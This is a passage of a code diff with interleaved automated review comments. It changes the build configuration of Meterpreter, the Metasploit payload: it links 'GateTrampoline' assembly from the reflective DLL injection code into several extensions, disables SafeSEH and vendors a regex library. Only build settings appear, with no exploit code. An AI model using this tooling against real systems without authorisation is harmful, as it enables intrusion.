 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -339,6 +342,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -360,6 +364,16 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ClInclude Include="..\..\source\extensions\sniffer\precomp.h" />
 <ClInclude Include="..\..\source\extensions\sniffer\sniffer.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -367,4 +381,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
index f783b441a..838f53c8c 100644
--- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
@@ -22,6 +22,7 @@ include_directories(../../source/common)
 include_directories(../../source/jpeg-8)
 include_directories(../../source/ReflectiveDLLInjection/common)
 include_directories(../../source/extensions/stdapi/server)
+include_directories(../../source/tiny-regex-c)
 set(SRC_DIR ../../source/extensions/stdapi)
 file(GLOB_RECURSE SRC_FILES
@@ -29,6 +30,7 @@ file(GLOB_RECURSE SRC_FILES
 ${SRC_DIR}/*.cpp
 ${SRC_DIR}/*.rc
 ${MOD_DEF_DIR}/extension.def
+ ../../source/tiny-regex-c/*.c
 )
 list(REMOVE_ITEM SRC_FILES ${CMAKE_CURRENT_SOURCE_DIR}/${SRC_DIR}/server/resource/hook.c)
@@ -56,7 +58,7 @@ if(MSVC)
 target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
 endif()
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 # Post processing (required for all Meterpreter DLLs)
 editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM})
diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
index 238aa06ee..26e85ed1d 100644
--- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
+++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
@@ -171,6 +171,7 @@
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -239,6 +240,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <GenerateDebugInformation>false</GenerateDebugInformation>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -306,6 +308,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
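Review bot: `../../source/tiny-regex-c/*.c` is added to the GLOB_RECURSE pattern list, so every .c file under that directory, including any test or example programs the vendored library may ship in subdirectories, is compiled into the extension, whereas the MSBuild project in the next file section adds only `re.c`. The explicit path `../../source/tiny-regex-c/re.c` keeps the two build systems in agreement and rules out picking up a stray main(). Since this is the first time a third-party regex engine is vendored into the tree, it would also help to record the upstream commit and licence alongside the copy so it can be audited and updated later.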
@@ -372,6 +375,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -439,6 +443,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <GenerateDebugInformation>false</GenerateDebugInformation>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -505,6 +510,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <GenerateDebugInformation>false</GenerateDebugInformation>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -559,6 +565,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClCompile Include="..\..\source\extensions\stdapi\server\webcam\bmp2jpeg.c" />
 <ClCompile Include="..\..\source\extensions\stdapi\server\webcam\webcam.cpp" />
 <ClCompile Include="..\..\source\logging\logging.c" />
+ <ClCompile Include="..\..\source\tiny-regex-c\re.c" />
 </ItemGroup>
 <ItemGroup>
 <ResourceCompile Include="..\..\source\extensions\stdapi\server\resource\stdapi.rc" />
@@ -587,10 +594,23 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs.h" />
 <ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs_local.h" />
 <ClInclude Include="..\..\source\extensions\stdapi\server\fs\search.h" />
+ <ClInclude Include="..\..\source\tiny-regex-c\re.h" />
 </ItemGroup>
 <ItemGroup>
 <None Include="..\..\source\extensions\stdapi\server\resource\hook.dll" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -598,4 +618,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt
index 0f1b5e349..441903957 100644
--- a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt
@@ -27,7 +27,7 @@ if(MSVC)
 set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE)
 endif()
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 if(MSVC)
 target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
 endif()
diff --git a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj
index 085a3deb0..7b3cceace 100644
--- a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj
+++ b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj
@@ -152,6 +152,7 @@
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -315,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -370,6 +374,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -424,6 +429,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -442,6 +448,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\extensions\unhook\refresh.h" />
 <ClInclude Include="..\..\source\extensions\unhook\unhook.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -449,4 +467,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt
index 99c8eaa32..44401059a 100644
--- a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt
@@ -43,7 +43,7 @@ set(LINK_LIBS
 ws2_32
 )
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 if(MSVC)
 target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
 endif()
diff --git a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj
index 77709c765..03ac0a384 100644
--- a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj
+++ b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj
@@ -151,6 +151,7 @@
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -205,6 +206,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -258,6 +260,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -312,6 +315,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -367,6 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -421,6 +426,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -446,8 +452,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <DeploymentContent>false</DeploymentContent>
 </ResourceCompile>
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln
index 453025ea6..df9f541d6 100644
--- a/c/meterpreter/workspace/meterpreter.sln
+++ b/c/meterpreter/workspace/meterpreter.sln
@@ -1,7 +1,7 @@
 Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 17
-VisualStudioVersion = 17.0.32112.339
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.33801.447
 MinimumVisualStudioVersion = 10.0.40219.1
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}"
 EndProject
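Review bot: The meterpreter.sln header is moved backwards from Visual Studio 17 to 16 (`# Visual Studio Version 16` / `VisualStudioVersion = 16.0.33801.447`), which reads like the IDE that last saved the file rewriting its own stamp rather than a deliberate change, and it will ping-pong with the next contributor who opens the solution in VS 2022. If the supported toolchain really is now VS 2019 that should be stated in the build documentation; otherwise this hunk is best dropped from the commit.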
diff --git a/c/meterpreter/workspace/metsrv/CMakeLists.txt b/c/meterpreter/workspace/metsrv/CMakeLists.txt
index 0cf47cde8..c75dc8b11 100644
--- a/c/meterpreter/workspace/metsrv/CMakeLists.txt
+++ b/c/meterpreter/workspace/metsrv/CMakeLists.txt
@@ -38,7 +38,7 @@ else()
 set(LINK_LIBS ${LINK_LIBS} ws2_32)
 endif()
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 # Post processing (required for all Meterpreter DLLs)
 editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM})
diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj b/c/meterpreter/workspace/metsrv/metsrv.vcxproj
index e307b3993..f08b1b983 100644
--- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj
+++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj
@@ -174,6 +174,7 @@
 <SubSystem>Windows</SubSystem>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -246,6 +247,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -316,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <SubSystem>Windows</SubSystem>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -338,7 +341,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 </HeaderFileName>
 </Midl>
 <ClCompile>
- <Optimization>MinSpace</Optimization>
+ <Optimization>Custom</Optimization>
 <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
 <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
 <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
@@ -359,6 +362,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
 <TreatWarningAsError>true</TreatWarningAsError>
 <MultiProcessorCompilation>true</MultiProcessorCompilation>
+ <OmitFramePointers>true</OmitFramePointers>
 </ClCompile>
 <ResourceCompile>
 <PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
@@ -384,6 +388,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <SubSystem>Windows</SubSystem>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -453,6 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
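Review bot: `<Optimization>Custom</Optimization>` replaces MinSpace in a single ClCompile group of metsrv.vcxproj (a release configuration, judging by the NDEBUG define in the adjacent ResourceCompile group), and `<OmitFramePointers>true</OmitFramePointers>` is added to that same group, while the other configurations in this project and in the sibling extension projects are left alone, so one build of metsrv now gets a different flag set from the rest. MinSpace maps to /O1, which already implies /Oy together with /Og /Ob2 /GF /Gy; Custom drops all of those and leaves only the explicitly listed switches (/Ob1, /Os, /Oy), so the hunk is a net loss of optimisation rather than a gain, and if the intent was only to guarantee frame-pointer omission for the new trampoline path, keeping MinSpace and adding `<OmitFramePointers>true</OmitFramePointers>` would have done that on its own (if this group is an x64 configuration, /Oy is x86-only and has no effect there at all). The motivation belongs in an XML comment next to the element, and whatever setting is chosen should be applied uniformly across the release configurations.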
@@ -521,6 +527,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <SubSystem>Windows</SubSystem>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <Bscmake>
 <SuppressStartupBanner>true</SuppressStartupBanner>
@@ -590,6 +597,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClCompile Include="..\..\source\metsrv\zlib.c" />
 <ClCompile Include="..\..\source\logging\logging.c" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters
index 5a497eff9..31fe6945c 100644
--- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters
+++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters
@@ -55,4 +55,8 @@
 <ClCompile Include="..\..\source\metsrv\metapi.c" />
 <ClCompile Include="..\..\source\logging\logging.c" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm" />
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm" />
+ </ItemGroup>
 </Project>
\ No newline at end of file
diff --git a/c/meterpreter/workspace/screenshot/CMakeLists.txt b/c/meterpreter/workspace/screenshot/CMakeLists.txt
index fbecb862f..da3ffcc44 100644
